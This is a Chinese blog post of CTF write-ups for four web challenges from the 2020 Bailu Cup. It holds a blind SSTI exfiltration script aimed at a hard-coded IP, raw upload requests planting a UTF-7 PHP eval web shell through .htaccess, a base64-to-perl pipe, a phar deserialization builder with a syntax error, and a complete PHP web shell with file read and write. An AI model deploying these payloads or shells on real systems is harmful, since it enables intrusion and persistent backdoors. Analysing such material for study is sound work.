Rayi
2020柏鹭杯部分web题解
2020/09/08

easy-flask

题目源码:

import flask
import os

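app = flask.Flask(__name__)
# Read the flag from the environment when one is provided; the literal is
# kept only as the original fallback. Anything hard-coded here is served to
# every client by index(), which returns the contents of /app/app.py
# (presumably this file).
app.config['FLAG'] = os.environ.get('FLAG', 'flag{213}')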

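@app.route('/')
def index():
    """Serve the application source file as the response body.

    Returns:
        The text of ``/app/app.py``. The file is opened in a ``with`` block
        so the handle is released even if ``read()`` raises (the original
        left it to the garbage collector).
    """
    # Exposing the source is the intended behavior of this endpoint; note
    # that it also exposes every secret hard-coded in the file.
    with open('/app/app.py', encoding='utf-8') as src:
        return src.read()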



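@app.route('/sandbox/<path:sandbox>')
def sandbox(sandbox):
    """Echo the path segment back to the client as escaped data.

    The original handler passed the user-controlled path to
    ``flask.render_template_string`` after a string-replace blocklist
    (stripping ``(``, ``)``, ``.``, ``{{``, ``}}`` and prepending
    ``{% set config=None %}{% set self=None %}``). Stripping characters
    from a template *source* is not a security boundary: Jinja2 still
    receives attacker-controlled template syntax, so the route was a
    server-side template injection sink. The fix keeps the template
    constant and passes the input as a context variable, which Flask
    autoescapes when rendering from a string.

    Args:
        sandbox: Remainder of the URL path; untrusted.

    Returns:
        The rendered response with ``sandbox`` inserted as an escaped value.
    """
    return flask.render_template_string('{{ s }}', s=sandbox)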



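if __name__ == '__main__':
    # debug=True enables Werkzeug's interactive debugger, which lets anyone
    # who triggers an unhandled exception run code in the process; with the
    # server bound to 0.0.0.0 that is reachable from every interface.
    # Debug is therefore opt-in (FLASK_DEBUG=1) instead of always on.
    app.run(host="0.0.0.0", port=5051,
            debug=os.environ.get("FLASK_DEBUG") == "1")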

ssti,盲注

利用[]绕过.的过滤,用set绕过关键词的过滤,利用&lcub;%if %&rcub;绕过&lcub;&lcub;&rcub;&rcub;

exp:

import requests
import time
import threading
import string

# At most 10 worker threads hold a permit at a time; each holds it for the
# duration of one get_content() call.
s1 = threading.Semaphore(10)  # maximum number of concurrent threads
count = 100  # estimated number of characters to recover
# Shared result buffer, one slot per position. get_content() writes slot
# pos-1 for position pos, so position 0 lands in result[-1] (the last slot)
# — an off-by-one in the original that is left as-is here.
result = []

# Pre-fill so that any thread can assign its slot by index.
for c in range(count):
    result.append('')
def get_content(pos):
    """Recover one character of app.config['FLAG'] through a boolean oracle.

    One GET is sent per candidate in string.printable; the template placed
    in the URL path yields the literal 'true~' only when the guessed
    character matches, and the response body is checked for that marker.

    Detection note: every position generates up to len(string.printable)
    requests whose *path* contains Jinja2 block syntax ({% ... %}) and the
    fixed marker 'true~' — a high-signal pattern for access-log or WAF
    rules on this route.

    Args:
        pos: Index of the character being tested.
    """
    s1.acquire()
    url = "http://124.70.223.68:12011/sandbox/"
    # As described above: [] instead of the filtered '.', a {% set %} alias
    # instead of the blocklisted word 'config', and {% if %} instead of the
    # stripped {{ }}.
    payload = "{% set conf='config' %}{% if url_for['__globals__']['current_app'][conf]['FLAG'][pos]=='payload' %}true~{% endif %}"
    headers = {
    'Content-Type':'application/x-www-form-urlencoded'
    }
    for i in string.printable:
        # 'payload' and 'pos' are plain placeholders substituted per request.
        tmp_url = url+payload.replace('payload',i).replace('pos',str(pos))
        #print(tmp_url)
        web = requests.get(tmp_url,headers=headers)
        if 'true~' in web.text:
            # NOTE(review): pos is 0-based (see the launcher loop) but the
            # hit is stored at pos-1, so position 0 ends up in result[-1].
            result[pos-1]=i
            print(result)
            print(''.join(result))
            break 
        time.sleep(0.5)
    # NOTE(review): not in a finally block — an exception from requests.get
    # leaks the permit and can stall the remaining threads.
    s1.release()
    
# One thread per position; the semaphore inside get_content() limits how
# many actually run at once. Threads are never joined, so the main thread
# does not wait for them.
for i in range(0,count):
   t = threading.Thread(target=get_content, args=(i,))
   t.start()

so_easy

可以扫描到upload.php,因为有302跳转,要自己构造文件上传,上传是白名单,过滤了<?php

传马

图片

POST /upload.php?file=1 HTTP/1.1
Host: xxx
Content-Length: 266
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryh11V9pJHVWBKRVWc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=194adgamo31jfs47egthbvs679
X-Forwarded-For: rayi12345sssssssss67
Connection: close





------WebKitFormBoundaryh11V9pJHVWBKRVWc
Content-Disposition: form-data; name="file"; filename="2.png"
Content-Type: image/gif

#define width 20
#define height 10
+ADw?php eval(+ACQAXw-POST+AFs'a'+AF0)+ADs ?+AD4-
------WebKitFormBoundaryh11V9pJHVWBKRVWc--

传htaccess
图片

POST /upload.php?file=1 HTTP/1.1
Host: xxx
Content-Length: 599
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryh11V9pJHVWBKRVWc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=194adgamo31jfs47egthbvs679
X-Forwarded-For: rayi12345sssssssss67
Connection: close





------WebKitFormBoundaryh11V9pJHVWBKRVWc
Content-Disposition: form-data; name="filename[2]"

.htaccess/
------WebKitFormBoundaryh11V9pJHVWBKRVWc
Content-Disposition: form-data; name="filename[0]"

png
------WebKitFormBoundaryh11V9pJHVWBKRVWc
Content-Disposition: form-data; name="file"; filename="a."
Content-Type: image/gif

#define width 1337
#define height 1337 
<Files ~ "^\.ht">
	Order allow,deny
	Allow from all
</Files>

php_value zend.multibyte 1
php_value zend.script_encoding "UTF-7"
AddType application/x-httpd-php .png
------WebKitFormBoundaryh11V9pJHVWBKRVWc--

蚁剑链接马
图片

最后读取flag需要执行一个文件进行计算

https://github.com/sixstars/starctf2019/tree/master/web-solve_readflag

改一改就行

# Pipes a base64 blob straight into perl. Decoded, it is a short Perl script
# (use IPC::Open3) that spawns /tmp/easy_flag, prints the first two lines it
# outputs, eval()s the second line as a Perl expression, writes the result
# back to the program's stdin and prints the next two lines of output.
# The blob can be inspected with `base64 -d` alone before the pipe into perl.
echo 'dXNlIHN0cmljdDsKdXNlIElQQzo6T3BlbjM7CgpteSAkcGlkID0gb3BlbjMoXCpDSExEX0lOLCBcKkNITERfT1VULCBcKkNITERfRVJSLCAnL3RtcC9lYXN5X2ZsYWcnKSBvciBkaWUgIm9wZW4zKCkgZmFpbGVkICQhIjsKCm15ICRyOwoKJHIgPSA8Q0hMRF9PVVQ+OwpwcmludCAiJHIiOwokciA9IDxDSExEX09VVD47CnByaW50ICIkciI7CiRyPWV2YWwgIiRyIjsKcHJpbnQgIiRyXG4iOwpwcmludCBDSExEX0lOICIkclxuIjsKJHIgPSA8Q0hMRF9PVVQ+OwpwcmludCAiJHIiOwokciA9IDxDSExEX09VVD47CnByaW50ICIkciI7'|base64 -d | perl

easy-mysql

mysql8 union table

https://www.codenong.com/cs106827255/

图片

查出admin的key来

图片

利用key读取源码

题目说flag在环境变量里,尝试执行phpinfo

rogue_mysql_server设置成phar:///tmp/mysql.sql,执行反序列化,利用eval执行phpinfo

https://www.smi1e.top/n1ctf2019-sql_manage%e5%87%ba%e9%a2%98%e7%ac%94%e8%ae%b0/

<?php 
/**
 * Bare data holder whose serialized form is stored as phar metadata below.
 * Only dbclose is assigned on this page ('phpinfo();'); the target-side
 * class that consumes these properties on unserialize is not shown here.
 */
class my
{
    public $db;
    public $dbclose // NOTE(review): missing ';' in the original — PHP will not parse this as written

}
// Builds phar.phar whose manifest metadata is the serialized `my` object;
// PHP unserializes that metadata when the archive is opened through the
// phar:// wrapper (the page does this via rogue_mysql_server, see above).
// unlink() errors are suppressed with @, so a stale file is not reported.
@unlink("phar.phar");
    $phar = new Phar("phar.phar"); // the extension must be .phar
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); // set the stub
    $o = new my();
	$o ->dbclose = 'phpinfo();';
    $phar->setMetadata($o); // store the custom object as manifest meta-data
    $phar->addFromString("test.txt", "test"); // add a file to the archive
    // the signature is computed automatically
    $phar->stopBuffering();
echo base64_encode(file_get_contents('phar.phar'));?>

图片

unserial

这道题没解出来,有哪大佬知道怎么做还请赐教
www.zip得源码webshell.php

<?php


//decode by http://www.yunlu99.com/
// Suppress all error output so the backdoor never leaks PHP notices.
ini_set("display_errors", 0);
error_reporting(0);
// Far-future caching headers plus an image/jpg Content-Type, while the
// body is base64-encoded JSON produced by the shell class below — a
// header/body mismatch that is a useful detection signal.
$seconds_to_cache = 86400;
$ts = gmdate("D, d M Y H:i:s", time() + $seconds_to_cache) . " GMT";
header("Expires: {$ts}");
header("Pragma: cache");
header("Cache-Control: max-age={$seconds_to_cache}");
header("Content-Type:image/jpg");
// Commands arrive as the raw request body (php://input); with an empty
// body the endpoint prints the current time-based salt instead.
$s = new shell();
$d = trim(file_get_contents('php://input'));
if ($d) {
	$s->check($d);
} else {
	$s->salt();
}
exit;
/**
 * Web shell driven by a base64-encoded, serialized PHP array in the request
 * body. Capabilities visible here: directory listing (glob), file read and
 * file write, each answered as base64(json(...)).
 *
 * Indicators for defenders: responses labelled image/jpg that carry base64
 * JSON text, request bodies that base64-decode to a PHP serialized array
 * with the keys pass/a1/a2/func, and an empty-body request that is answered
 * with a short binary string (the salt).
 */
class shell
{
	private $method = '';
	private $func = 'salt';   // action used when check() does not accept the request
	private $a1 = '';         // first argument (glob pattern / file path)
	private $a2 = '';         // second argument (content for post_fw)
	private $pass = '123456'; // hard-coded password component
	public function __construct()
	{
		// 'get' or 'post' selects which private handler __call() dispatches to.
		$this->method = $_SERVER['REQUEST_METHOD'] == 'GET' ? 'get' : 'post';
		// The salt changes every minute and is bound to the caller's address.
		// NOTE(review): $salt is never declared as a property (dynamic
		// property, deprecated as of PHP 8.2).
		$this->salt = md5($_SERVER['REMOTE_ADDR'] . date('Y-m-d H:i'));
	}
	// GET + func 'dv': list paths matching the glob pattern in a1.
	private function get_dv()
	{
		echo base64_encode(json_encode(glob($this->a1)));
	}
	// GET + func 'fv': read the file named by a1.
	private function get_fv()
	{
		echo base64_encode(json_encode(file_get_contents($this->a1)));
	}
	// POST + func 'fw': write a2 into the file named by a1.
	private function post_fw()
	{
		echo base64_encode(json_encode(file_put_contents($this->a1, $this->a2)));
	}
	// Converts a hex string to raw bytes two characters at a time (same name
	// as PHP's built-in hex2bin(), but as a method it does not conflict).
	public function hex2bin($str)
	{
		$sbin = "";
		$len = strlen($str);
		for ($i = 0; $i < $len; $i += 2) {
			$sbin .= pack("H*", substr($str, $i, 2));
		}
		return $sbin;
	}
	// Default action: emits the salt as 16 raw bytes (hex2bin of the md5 hex).
	public function salt()
	{
		echo $this->hex2bin($this->salt);
	}
	/**
	 * Authenticates and dispatches one command.
	 *
	 * $d is base64 text handed to unserialize() before any check —
	 * deserialization of untrusted input. If md5 of the supplied pass
	 * equals md5(md5($pass . $salt)), a1/a2/func are taken from the
	 * request; otherwise func keeps its default. Either way the method
	 * named by func is then invoked; a name that matches no method falls
	 * through to __call().
	 */
	public function check($d)
	{
		$d = unserialize(base64_decode($d));
		if (isset($d['pass']) && md5($d['pass']) === md5(md5($this->pass . $this->salt))) {
			$this->a1 = $d['a1'];
			$this->a2 = $d['a2'];
			$this->func = $d['func'];
		}
		$this->{$this->func}();
	}
	// Builds "<get|post>_<func>" and invokes it; this is how the private
	// handlers above are reached. $n and $a are ignored.
	public function __call($n, $a)
	{
		$func = $this->method . '_' . $this->func;
		$this->{$func}();
	}
}

之后卡住了,一直爆破密码。。。

后来主办方说不用爆破,就没法了


本文作者:Rayi
版权声明:本文首发于Rayi的博客,转载请注明出处!